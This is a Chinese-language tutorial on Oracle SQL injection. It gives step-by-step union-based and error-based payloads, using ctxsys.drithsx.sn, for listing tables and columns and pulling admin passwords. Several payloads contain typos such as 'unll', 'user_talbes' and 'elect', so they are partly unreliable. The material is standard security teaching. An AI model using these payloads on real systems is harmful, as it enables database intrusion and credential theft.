网络安全从入门到精通(第五章-5)Oracle注入 — 报错注入

本文内容:

  • 注入函数解析
  • oracle报错注入函数解析
  • oracle注入+联合查询[union all]
  • oracle报错注入具体流程

1,注入函数解析:

  Dual是一个实表[也有说它是虚表],如果你直接查询它,它只显示一个X,列名为DUMMY.

  像Mysql这样的语句:select1,2,3oracle是绝对不能运行,但是又想运行怎么办,oracle就提供了一个虚表Dual。

  作用:为了满足sql这语句的结构,为了严禁的语法。

  oracle可以调用系统函数,还可以进行加减法运算。

  oracle弱化了库的概念,它以用户名作为区分,用户名=库名。

  select * from all_tables 查询所有的表

  select * from user_tables 查询出当前用户的表

  select * from all_tab_columns 查询出所有的字段

  select * from user_tab_columns 查询出当前用户的字段

  对于oracle想取第一条之后的数据可以使用:rownum=1[限制查询返回的总行数为一条]和<>不等于相结合

  用法:and 字段名<>记录[数据]

2,oracle报错输入函数解析:

  ctxsys.drithsx.sn(user,(select banner from v$version where rownum=1))

  查询关于主题的对应关键词,然后因为查询失败(应该是这个用户没有创建和查询的权限,默认情况没有创建,爆出未查询到的错误从而爆出查询的内容)。

  报错注入的核心:使数据库出错,然后强行丢出一个致命性的错误,这个错误信息里面的内容我们可以控制。

3,oracle注入+联合查询[union all]

  联合查询:[判断注入点、判断字段数、判断输出点、查询表、查询数据]

  例题:elect *from aabb where  id='1'

  1.判断是否存在sql注入:

    'and 1=1 和 ' and 1=2 -- qwe

  2.判断字段数:

    'order by 1…… -- qwe

  3.判断输出点:

    ' union select null,null,null,……, from Dual -- qwe

  4.查询表:

    ' union select null,null,table_name from user_talbes  -- qwe

  5.查询字段:

    ' union select unll,null,column_name from user_tab_columns -- qwe

  6.查询数据:

    ' union select unll,null,pw from admin -- qwe

  解释:pw、admin是查询出来的字段和表。

4,报错注入具体流程:

  1.判断是否存在sql注入:

    'and =1=1 和and 1=2 -- qwe

  2.使用报错函数,获取表名:

    'and 1 = ctxsys.drithsx.sn(1,(select table_name from user_tables where rownum=1))

  3.使用报错函数,获取字段名:

    'and 1= ctxsys.drithsx.sn(1,(select column_name from user_tab_columns where table_name='admin' rownum=1)) -- qwe

  4.使用报错函数,获取数据:

    'and 1= ctxsys.drithsx.sn(1,(select upass from admin where rownum=1 and uname='xx')) -- qwe

 

上一篇:Vue v-model 双向绑定


下一篇:Linux下新建txt文件并编辑